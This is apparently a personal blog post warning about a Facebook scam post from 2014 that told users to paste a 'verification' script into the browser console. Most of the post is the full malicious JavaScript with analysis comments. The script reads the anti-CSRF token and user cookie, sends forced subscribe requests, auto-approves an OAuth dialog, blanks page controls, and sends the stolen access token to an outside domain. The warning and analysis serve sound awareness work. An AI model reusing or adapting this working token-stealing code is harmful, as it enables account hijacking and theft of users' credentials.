Dangerous Facebook post that saves users access token

I checked this myself. I found a post, shared by my friends, which stated that they had verified their Facebook profiles using a tool. The post claimed that all profiles must be verified or else they would be deactivated.

Facebook
The main thread was opened at 8:13 PM IST. The link is https://www.facebook.com/1441196272800278 (since deleted by Facebook).




The post listed a few steps: it asked the user to download a JavaScript file from http://seniphoto.com/VerifyFacebook.txt (Don't visit this), open the JavaScript console in their browser, paste the code there and press Enter.
That runs the third-party script in the context of the user's Facebook account, with the same access as the logged-in user (a technique commonly called self-XSS). The danger is unimaginable: the script sends the user's access token to http://www.facebookverify.co.vu (Don't visit this).
Facebook eventually stopped the thread at 11:15 PM IST.
The domain www.facebookverify.co.vu is hosted on Google Server Engine. The document was last modified on Sun, 08 Jun 2014 17:46:27 GMT.

I am posting the script here :

// Analysis note: string lookup table. Every entry is hex-escaped, and the rest of this part
// indexes into it, so property names, the request URL and the request parameters are not
// readable at a glance. Decoded:
//   [0] "value"   [1] "fb_dtsg"   [2] "getElementsByName"   [3] "match"   [4] "cookie"
//   [5] "//www.facebook.com/ajax/friends/lists/subscribe/modify"
//   [6]-[9] query-string fragments beginning "flid=", "&action=subscribe…", "&__a=1…", "&phstamp="
//   [10] "POST"   [11] "open"   [12] "onreadystatechange"   [13] "readyState"
//   [14] "status" [15] "close"  [16] "send"
//   [17]-[26] ten numeric ID strings, each later sent as the "flid" value.
var _0x7578=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x6C\x69\x73\x74\x73\x2F\x73\x75\x62\x73\x63\x72\x69\x62\x65\x2F\x6D\x6F\x64\x69\x66\x79","\x66\x6C\x69\x64\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x75\x62\x73\x63\x72\x69\x62\x65\x26\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x66\x65\x65\x64\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x67\x72\x6F\x75\x70\x5F\x6D\x61\x6C\x6C\x26\x66\x74\x5B\x74\x79\x70\x65\x5D\x3D\x34\x30\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x44\x48\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x78\x6F\x4E\x70\x47\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x79\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x70\x68\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x32\x37\x37\x39\x32\x35\x38\x35\x35\x36\x38\x36\x38\x33\x38","\x32\x39\x31\x32\x32\x39\x36\x38\x31\x30\x32\x33\x31\x32\x32","\x36\x35\x36\x34\x34\x32\x35\x32\x31\x30\x35\x32\x34\x37\x30","\x34\x32\x36\x33\x30\x32\x33\x34\x37\x35\x31\x35\x38\x35\x34","\x34\x32\x36\x33\x30\x32\x34\x36\x37\x35\x31\x35\x38\x34\x32","\x34\x32\x36\x33\x30\x32\x35\x38\x37\x35\x31\x35\x38\x33\x30","\x34\x32\x36\x33\x30\x32\x37\x31\x34\x31\x38\x32\x34\x38\x34","\x32\x38\x38\x35\x32\x34\x36\x35\x37\x39\x37\x31\x34\x33\x38","\x33\x39\x34\x32\x35\x31\x30\x30\x30\x36\x39\x30\x34\x33\x33","\x33\x39\x33\x38\x30\x35\x34\x37\x30\x37\x33\x34\x39\x38\x36"]
// Equivalent to document.getElementsByName("fb_dtsg")[0].value: reads a form field from the
// page the victim has open.
// NOTE(review): fb_dtsg is presumably the site's per-session anti-CSRF token — confirm. If so,
// this is why the paste-into-console step matters: the script reads the token same-origin.
var fb_dtsg=document[_0x7578[2]](_0x7578[1])[0][_0x7578[0]];
// Equivalent to document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).
// The inner match captures the digits after "c_user=" (it throws if that cookie is absent);
// the outer match yields a match array that stringifies to those digits when concatenated.
var user_id=document[_0x7578[4]][_0x7578[3]](document[_0x7578[4]][_0x7578[3]](/c_user=(\d+)/)[1]);
// Analysis note: despite its name, verifyfb verifies nothing. It sends one asynchronous POST
// to the "subscribe/modify" path held in table slot 5, with the given ID as "flid" plus the
// victim's user id and the fb_dtsg value read above.
// Parameter: _0x45dcx4 — the ID string placed after "flid=" in the request body.
// Returns nothing; the response is not used.
function verifyfb(_0x45dcx4)
{
 var _0x45dcx5= new XMLHttpRequest();
 // Request target: the protocol-relative Facebook path from table slot 5.
 var _0x45dcx6=_0x7578[5];
 // Body: "flid=<id>" + slot 7 + user_id + slot 8 + fb_dtsg + slot 9, plain concatenation.
 var _0x45dcx7=_0x7578[6]+_0x45dcx4+_0x7578[7]+user_id+_0x7578[8]+fb_dtsg+_0x7578[9];
 // open("POST", url, true): asynchronous. Run from a facebook.com page this is a same-origin
 // request, so the browser is expected to attach the victim's session cookies.
 _0x45dcx5[_0x7578[11]](_0x7578[10],_0x45dcx6,true);
 _0x45dcx5[_0x7578[12]]=function ()
 {
  // On completion (readyState 4, status 200) the handler only reads the "close" property;
  // it is a bare property read with no call, so it has no effect.
  if(_0x45dcx5[_0x7578[13]]==4&&_0x45dcx5[_0x7578[14]]==200)
  {
   _0x45dcx5[_0x7578[15]];
  }
 }
 ;
 // send(body)
 _0x45dcx5[_0x7578[16]](_0x45dcx7);
}
;
// Analysis note: one subscribe request per ID in table slots 17-26, i.e. ten requests are
// issued in the victim's session as soon as the pasted code runs.
verifyfb(_0x7578[17]);
verifyfb(_0x7578[18]);
verifyfb(_0x7578[19]);
verifyfb(_0x7578[20]);
verifyfb(_0x7578[21]);
verifyfb(_0x7578[22]);
verifyfb(_0x7578[23]);
verifyfb(_0x7578[24]);
verifyfb(_0x7578[25]);
verifyfb(_0x7578[26]);

// Analysis note: second part of the script (not obfuscated). Everything down to the closing
// brace after tokenyolla runs only when this hostname test passes.
// String.prototype.indexOf takes (searchString, position), so only "www.facebook.com" is
// actually searched for; the other three hostnames are not compared.
if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
// Victim's numeric user id taken from the c_user cookie (same double-match pattern as part 1),
// converted to a string. Throws if the cookie is absent.
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
// Analysis note: first step of a scripted permission flow. Fetches `url` with an asynchronous
// GET and, if the response contains a form, hands that form to duzenlevegonder for submission.
// Nothing is displayed: the response is parsed into a detached <html> element.
// NOTE(review): the identifier looks Turkish (roughly "grant app permission") — confirm.
// Parameter: url — the page to fetch (the caller passes the OAuth dialog URL from TokenUrl).
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
// readyState 4 = request finished; the HTTP status is not checked.
if(xmlhttp.readyState == 4){
// izinverhtml and act are assigned without var/let, so they become globals.
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
// Keep only the first form of the response and take its action URL as the submit target.
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};  
xmlhttp.open("GET", url, true); 
xmlhttp.send();
}
// Analysis note: submits a fetched form on the victim's behalf with the "confirm" choice
// forced, then either repeats for the next form in the response or extracts the access token.
// This is what turns the permission dialog into a step the victim never sees or approves.
// NOTE(review): the identifier looks Turkish (roughly "edit and send") — confirm.
// Parameters: formnesne — detached element holding the form; act — URL to POST to.
function duzenlevegonder(formnesne,act){
// izinverparams and the loop index i are implicit globals (no var/let).
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
// Copies every input whose name does not contain "__CANCEL__". The second test uses the raw
// indexOf result as a boolean, so it rejects only names that start with "cancel_clicked".
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
// name=value pairs are concatenated as-is, without URL-encoding.
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
// Forces the first <select> of the form to the value 80.
// NOTE(review): presumably the dialog's audience/visibility selector — confirm.
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
// The result of replace() is discarded, so this line leaves izinverparams unchanged.
izinverparams.replace("&fb_dtsg","fb_dtsg");
// Adds the confirmation field, i.e. answers the dialog with "confirm".
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
     izinhtml = document.createElement("html");
     izinhtml.innerHTML = xmlhttp.responseText;
   // Another form in the response means another dialog step: submit that one as well.
   if(izinhtml.getElementsByTagName("form").length > 0){
     izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
     act = izinhtml.getElementsByTagName("form")[0].action;
     duzenlevegonder(izinhtml,act)
   }else{
   // No further form: look for "#access_token=…&expires_in" in the response text and pass the
   // captured token to tokenyolla. If the pattern is absent, match() returns null and the
   // sex[1] access throws.
   sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
   if (sex[1]) {
   tokenyolla(sex[1]);
   }
   }
   }
        };

xmlhttp.open("POST", act , true); 
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);

}

// Analysis note: builds the OAuth dialog URL for the app with client_id `id`.
// response_type=token asks for the access token to be returned directly, and the requested
// scope is email, publish_stream, user_likes, friends_likes and user_birthday.
// Parameter: id — application (client) id. Returns the protocol-relative dialog URL.
function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}

// Analysis note: entry point of the token flow. It runs when localStorage has no
// "token_<profile_id>" entry, or when that entry is not later than tarih.getTime().
// `tarih` is not defined anywhere in this listing, and nothing shown here writes the
// localStorage key, so the second condition cannot be evaluated from this page alone.
if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
// Starts the scripted permission flow for app id 121876164619130.
// NOTE(review): a token granted this way presumably stays usable until it expires or the
// app's authorization is removed from the account — affected users should review and remove
// unknown apps in their account settings; confirm against the platform's documentation.
uygulamaizinver(TokenUrl("121876164619130"));
// Synchronous GET (third argument false) over plain http for the victim's public profile
// record; only the name field is kept, and `isim` is not used again in this listing.
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
// Analysis note: every 200 ms, empties the contents of all elements with the classes "_5ce",
// "uiToggle wrap" and "uiPopover" on the page the victim has open.
// NOTE(review): these are presumably Facebook menu/popover controls; blanking them would keep
// the victim from using those controls while the page stays open — confirm what they are.
// getElementsByClassName always returns a collection, so the three if-guards always pass.
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
// Analysis note: the exfiltration step. Navigates the top-level window to the external site
// with the access token appended as the URL fragment, over plain http. A fragment is not part
// of the HTTP request itself; it is readable by script running on the destination page.
// NOTE(review): the identifier looks Turkish (roughly "send token") — confirm.
// Parameter: token — the access token captured in duzenlevegonder.
function tokenyolla(token){
top.location.href = 'http://www.facebookverify.co.vu/#' + token;
// The second brace closes the location.hostname check that wraps this whole part.
}}

About Venkata Jaswanth U

ThoughtWorker, Computer Science graduate from India. I am passionate programmer, blogger, thinker. I love open-source and linux. I love making friends. Just send me 'hi' to any of my social profiles. I love helping people.